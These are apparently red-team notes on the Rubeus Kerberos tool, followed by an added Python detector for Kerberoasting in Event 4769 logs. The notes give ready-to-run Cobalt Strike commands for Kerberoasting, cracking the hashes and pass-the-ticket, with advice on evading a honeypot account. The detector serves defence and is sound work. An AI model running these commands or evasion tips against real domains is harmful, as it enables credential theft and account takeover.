Rubeus is a tool for enumerating and abusing Kerberos.

Usage

Rubeus.exe [subcommand]

Subcommands

  • triage: list all Kerberos tickets in the current logon session (if elevated, lists all tickets on the machine)
  • dump /luid:[luid] /service:[service name]: dump the ticket identified by the user's LUID (see triage) and service (the service will be krbtgt if the ticket is a TGT); /service is optional
    • add /nowrap to output hash on one line (makes copying easier)
  • Kerberoasting: beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
    • automatically enumerates all Kerberoastable users and dumps their hashes
    • The TGS-REP hashes dumped can be cracked (e.g. using hashcat) to obtain the plaintext password.
    • hashcat: -a 0 -m 13100 [hashes] [wordlist]
    • john: --format=krb5tgs --wordlist=[wordlist] [hashes]
    • OPSEC warning: This command finds every Kerberoastable user. If there is an intentionally roastable honeypot account, running the command will be a clear indication of attack to the blue team.
    • Alternatively, use ADSearch to enumerate the roastable users, and dump the hash manually: beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:[username] /nowrap
  • beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[tgs-base64]
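
The OPSEC warning above, from the blue team's side: requests for many service accounts' tickets typically appear on the domain controller as Event ID 4769 records with RC4 (etype 23, the type hashcat -m 13100 works on), and any request for the honeypot account is an alert by itself. The Python below is an added example, not part of the original page or of Rubeus; the event records are constructed, and the decoy name svc_honey, the window and the threshold are assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Event ID 4769 records reduced to the fields used below.
SAMPLE_4769 = [
    '{"time":"2024-05-01T10:00:01","TargetUserName":"alice@CORP.EXAMPLE","ServiceName":"HOST01$","TicketEncryptionType":"0x12"}',
    '{"time":"2024-05-01T10:02:10","TargetUserName":"bob@CORP.EXAMPLE","ServiceName":"svc_sql","TicketEncryptionType":"0x17"}',
    '{"time":"2024-05-01T10:02:11","TargetUserName":"carol@CORP.EXAMPLE","ServiceName":"svc_sql","TicketEncryptionType":"0x17"}',
    '{"time":"2024-05-01T10:02:12","TargetUserName":"bob@CORP.EXAMPLE","ServiceName":"svc_web","TicketEncryptionType":"0x17"}',
    '{"time":"2024-05-01T10:02:13","TargetUserName":"bob@CORP.EXAMPLE","ServiceName":"svc_honey","TicketEncryptionType":"0x17"}',
    '{"time":"2024-05-01T10:02:14","TargetUserName":"bob@CORP.EXAMPLE","ServiceName":"svc_backup","TicketEncryptionType":"0x17"}',
]

HONEY_SERVICES = {"svc_honey"}   # hypothetical decoy account; nothing legitimate requests it
RC4_HMAC = 0x17                  # etype 23
WINDOW = timedelta(minutes=5)    # assumed tuning values, adjust per environment
THRESHOLD = 3                    # distinct RC4 service accounts per requester in WINDOW

def detect(lines, honey=HONEY_SERVICES, threshold=THRESHOLD, window=WINDOW):
    """Return (rule, requester, detail) alerts for time-ordered 4769 JSON lines."""
    alerts, flagged = [], set()
    recent = defaultdict(list)   # requester -> [(time, service)] for RC4 requests
    for line in lines:
        ev = json.loads(line)
        when = datetime.fromisoformat(ev["time"])
        requester = ev["TargetUserName"].split("@")[0].lower()
        service = ev["ServiceName"].lower()
        if service in honey:     # any request for the decoy is an alert on its own
            alerts.append(("honey_spn", requester, service))
        # Machine accounts (trailing $) and krbtgt are not user service accounts.
        if (int(ev["TicketEncryptionType"], 16) != RC4_HMAC
                or service.endswith("$") or service == "krbtgt"):
            continue
        # Keep only this requester's RC4 requests that fall inside the window.
        hits = [(t, s) for t, s in recent[requester] if when - t <= window]
        hits.append((when, service))
        recent[requester] = hits
        distinct = sorted({s for _, s in hits})
        if len(distinct) >= threshold and requester not in flagged:
            flagged.add(requester)   # one fan-out alert per requester
            alerts.append(("rc4_fanout", requester, ",".join(distinct)))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_4769):
        print(alert)
```

The per-user variant on the page requests a single ticket and stays under the fan-out threshold, so the decoy rule and RC4 monitoring on individual sensitive accounts matter more than the count.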